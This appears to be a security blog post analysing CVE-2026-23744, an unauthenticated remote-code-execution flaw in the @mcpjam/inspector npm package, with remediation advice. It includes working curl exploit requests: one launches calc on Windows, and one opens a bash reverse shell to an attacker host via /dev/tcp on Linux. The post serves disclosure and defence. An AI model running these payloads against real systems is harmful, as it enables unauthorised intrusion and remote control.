Skip to content

RCE on MCPJam <= v1.4.2 (CVE-2026-23744)

Metric Details
Severity Rating Critical
CVSS v4 score 9.2
CVSS v4 vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
Component Affected @mcpjam/inspector (npm package)
Affected Versions <= 1.4.2
Patched Version 1.4.3

Vulnerability description

CVE-2026-23744 is a critical remote code execution (RCE) flaw discovered within the @mcpjam/inspector utility, a local-first development platform for Model Context Protocol (MCP) servers. The flaw is primarily caused by an insecure default configuration combined with missing authorisation controls on a critical functional component (CWE-306). By default, the utility binds its HTTP listening server globally to all network interfaces (0.0.0.0) rather than restricting traffic internally via the loopback address (127.0.0.1):

const server = serve({
    fetch: app.fetch,
    port: SERVER_PORT,
    hostname: "0.0.0.0", // Exposes endpoints globally
});

Because the application endpoints are remotely accessible across the network, an unauthenticated attacker can interface directly with the /api/mcp/connect API route. This endpoint is designed to mount and connect to external MCP servers. When a request hits this route, the back-end parses incoming JSON structures to extract execution fields—specifically the command and args vectors inside the serverConfig block—and executes them directly via system subprocess handlers without performing any security checks, input filtering, or authorisation validation.

Exploitation - Windows deployment

On a Windows asset hosting the vulnerable platform, an attacker can exploit the missing access constraint to execute arbitrary terminal payloads. By passing standard administrative interpreters like cmd.exe or powershell.exe into the invalidated command variable, paired with an instruction execution flag (such as /c), an external user can force the underlying operating system to run unauthorised tasks under the context of the running node application process.

Proof-of-Concept

An RCE attack can be initialised by transmitting a structured HTTP POST request directly to the target network socket (port 6274 by default):

curl http://<TARGET_WINDOWS_IP>:6274/api/mcp/connect \
  --header "Content-Type: application/json" \
  --data "{\"serverConfig\":{\"command\":\"cmd.exe\",\"args\":[\"/c\", \"calc\"],\"env\":{}},\"serverId\":\"mytest\"}"

Attack Vector Breakdown

  1. API Delivery: The request interfaces over the network with the vulnerable connection handler path (/api/mcp/connect).
  2. Interpreter Target: The payload maps cmd.exe to the command variable, instructing the Windows platform to run the Command Prompt utility.
  3. Argument Hijacking: The args list provides the execution payload instructions (/c to execute and terminate, followed by the target executable command, such as calc).
  4. Subprocess Trigger: The inspector processes the input block directly. Because it lacks parameter isolation, the environment executes cmd.exe /c calc, immediately triggering the command payload on the remote system with zero user interaction.

Exploitation - Linux deployment

While public exploit code and disclosures traditionally focus on Windows environments (using cmd.exe /c), testing indicates that the underlying execution block parses system commands via default Linux shells natively.

On a Linux runtime environment, an attacker can exploit the missing verification boundary by structuring a payload to invoke bin/bash along with a standard file-descriptor redirection sequence (>& /dev/tcp/), achieving an interactive reverse shell callback over the network.

Proof-of-Concept

An RCE attack can be initialised by transmitting a structured HTTP POST request directly to the target network socket containing the Linux execution payload:

curl http://<TARGET_LINUX_IP>:6274/api/mcp/connect \
  --header "Content-Type: application/json" \
  --data "{\"serverConfig\":{\"command\":\"/bin/bash\",\"args\":[\"-c\", \"bash -i >& /dev/tcp/<ATTACKER_IP>/<ATTACKER_PORT> 0>&1\"],\"env\":{}},\"serverId\":\"mytest\"}"

Attack Vector Breakdown

  1. API Delivery: The request interfaces over the network with the vulnerable connection handler path (/api/mcp/connect).
  2. Interpreter Target: The payload maps /bin/bash to the command variable, instructing the Linux platform to spawn a bash environment.
  3. Argument Hijacking: The args list provides the execution flag -c followed by a classic TCP backpipe string (bash -i >& /dev/tcp/... 0>&1).
  4. Execution Delivery: The backend processes the object inputs immediately without validation, executing the backpipe command under the privilege context of the service account running the node application process, establishing an outbound interactive terminal session.

Remediation Recommendations

To eliminate CVE-2026-23744 and protect deployment environments against remote command execution, developers and platform administrators must apply the following remediation steps immediately.

The vendor has addressed this vulnerability by implementing safety validation and input parameterization in commit e6b9cf9. Production systems must upgrade the @mcpjam/inspector package to at least version 1.4.3 at the time of this post to replace the vulnerable command handling code:

npm update @mcpjam/inspector@latest


References

The analysis detailed in this post was compiled by referencing the official security advisories and documentation detailed below.

AI generated content

Some of the content on this blog is generated by AI and may contain mistakes. If you notice an issue or technical oversight, please reach out via email at hello@x6b.me.